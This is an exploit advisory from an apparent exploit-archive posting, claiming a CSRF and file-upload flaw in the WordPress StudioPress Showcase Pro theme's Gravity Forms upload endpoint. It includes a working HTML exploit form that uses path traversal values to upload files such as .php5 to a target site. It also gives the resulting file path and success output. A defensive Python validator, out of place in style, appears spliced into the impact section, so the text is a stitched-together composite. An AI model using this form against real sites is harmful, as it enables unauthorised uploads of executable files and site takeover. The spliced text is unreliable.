KingSkrupellos

WordPress StudioPress Showcase Pro Genesis Framework CSRF

May 21st, 2019
####################################################################

# Exploit Title : WordPress StudioPress Showcase Pro Genesis Framework CSRF Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 22/05/2019
# Vendor Homepage : studiopress.com - gravityforms.com
# Software Information Link : my.studiopress.com/themes/showcase/
# Software Affected Versions : N/A
# Software Price Type : Paid Download - 129.95 $
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
WordPress StudioPress Showcase Pro Genesis Framework is vulnerable to
cross-site request forgery, caused by improper validation of user-supplied input.
By persuading an authenticated user to visit a malicious website, a remote attacker
could send a malformed HTTP request to perform unauthorized actions.
An attacker could exploit this vulnerability to perform cross-site scripting
attacks, web cache poisoning, and other malicious activities.

The web application does not, or cannot, sufficiently verify whether a well-formed,
valid, consistent request was intentionally submitted by the user it appears to come from.
When a web server is designed to receive a request from a client without any mechanism
for verifying that it was intentionally sent, an attacker may be able to trick a
client into making an unintentional request to the web server, which will be treated as an
authentic request. This can be done via a URL, an image load, an XMLHttpRequest, etc., and
can result in exposure of data or unintended code execution.
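The missing checks described above, shown from the defending side as an added example (not code from this advisory, the theme or the plugin): a server-side validator for an upload request shaped like the form below, combining an anti-CSRF token bound to the session, strict validation of the two fields that become path segments, a file-extension allowlist, and a final containment check on the resolved path. The field names follow the form; the upload root, secret, session id and sample requests are constructed assumptions.

```python
import hashlib
import hmac
import os
import re

# Assumed values for this example; none of them come from the advisory.
UPLOAD_ROOT = os.path.realpath("/srv/www/uploads/gravity_forms/tmp")
SECRET = b"example-secret-key"                  # constructed: the site's token secret
SAFE_EXT = {"jpg", "png", "gif", "pdf", "txt"}  # allowlist: no html, php*, phtml
IDENT = re.compile(r"[A-Za-z0-9_-]{1,64}")      # what a form id / unique id may look like

def make_token(session_id: str) -> str:
    """Per-session anti-CSRF token: HMAC-SHA256 over the session id."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def error(code: int, message: str) -> dict:
    return {"status": "error", "error": {"code": code, "message": message}}

def check_upload(req: dict, session_id: str) -> dict:
    """Validate the POST fields of an upload request and return the JSON-style verdict.
    req holds form_id, gform_unique_id, name and the submitted csrf_token."""
    # 1. CSRF: a cross-site form cannot read the victim's token, so require it.
    if not hmac.compare_digest(req.get("csrf_token", ""), make_token(session_id)):
        return error(403, "Missing or invalid CSRF token.")
    # 2. Path traversal: form_id and gform_unique_id are used as directory names,
    #    so they must be plain identifiers, never '../../../'.
    for field in ("form_id", "gform_unique_id"):
        if not IDENT.fullmatch(req.get(field, "")):
            return error(400, f"Invalid {field}.")
    # 3. File name: a bare basename with an allowlisted extension.
    name = req.get("name", "")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if name != os.path.basename(name) or ext not in SAFE_EXT:
        return error(400, "File type not allowed.")
    # 4. Containment: the resolved destination must still be under UPLOAD_ROOT.
    dest = os.path.realpath(os.path.join(UPLOAD_ROOT, req["form_id"], req["gform_unique_id"], name))
    if os.path.commonpath([dest, UPLOAD_ROOT]) != UPLOAD_ROOT:
        return error(400, "Path escapes upload directory.")
    return {"status": "ok", "data": {"temp_filename": dest}}

# Constructed sample requests: FORGED mirrors the field values in the PoC form.
FORGED = {"form_id": "../../../", "gform_unique_id": "../../", "name": "kingskrupellos.html", "csrf_token": ""}
LEGIT = {"form_id": "7", "gform_unique_id": "a1b2c3", "name": "scan.pdf", "csrf_token": make_token("sess-42")}
```

The forged request fails at the token check; with a valid token it still fails on the traversal values, and a `.php5` name fails the allowlist, so each layer rejects the request on its own.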

####################################################################

# CSRF Cross Site Request Forgery Exploit :
****************************************
<title>WordPress StudioPress Showcase Pro Genesis Framework Input Exploiter</title>

<form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">

<body background=" ">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.html" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

</form>

# Directory File Path :
***********************
/_input__kingskrupellos.php5

/_input__[YOURFILENAME].php5

# Vulnerability Error :
*******************
{"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}

# Vulnerability Error [ Successful ] :
*******************************
{"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}

# Allowed File Extensions :
*************************
.html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf

# Example Usage for Windows :
******************************
# Use with XAMPP Control Panel and your Localhost.
# Use from htdocs folder located in XAMPP

# 127.0.0.1/wordpressshowcasegenesisframeworkexploiter.html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################